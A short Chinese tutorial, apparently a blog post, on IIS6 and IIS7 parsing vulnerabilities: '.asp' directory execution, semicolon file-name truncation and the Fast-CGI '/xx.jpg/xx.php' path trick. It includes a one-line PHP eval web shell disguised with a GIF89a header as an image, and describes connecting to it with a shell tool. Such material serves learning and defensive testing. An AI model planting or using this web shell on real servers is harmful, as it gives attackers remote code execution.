IIS6的目录解析漏洞
在iis6.x中,.asp⽂件夹中的任意⽂件都会被当做asp⽂件去执⾏。
在网站根目录处创建一个.asp目录,分别在网站根目录和.asp目录里创建一个1.txt文件,文件内容都是<%=now()%> asp代码
分别访问一下:
IIS6的畸形文件解析
在IIS 6 处理⽂件解析时,分号可以起到截断的效果。也就是说2.asp;.jpg会被服务器看成是2.asp。
咱们创建一个2.asp;.jpg,从文件格式上看是jpg文件,但是中间件会把他当作asp文件
IIS7的/漏洞
在默认Fast-CGI开启状况下,在⼀个⽂件路径/xx.jpg后⾯加上/xx.php会将 /xx.jpg/xx.php 解析为 php ⽂件。条件是1. php.ini⾥的cgi.fix_pathinfo=1 开启 2. IIS7在Fast-CGI运⾏模式下
在网站根目录下创建一个jpg文件,里面写入
GIF89a
<?php @eval($_POST[a]);?>
浏览器访问一下
可以访问到,并且是jpg形式的
咱们在后面加上/.php,再访问一下
也可以访问到,并且是php形式的
拿工具连一下木马
可以连上
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
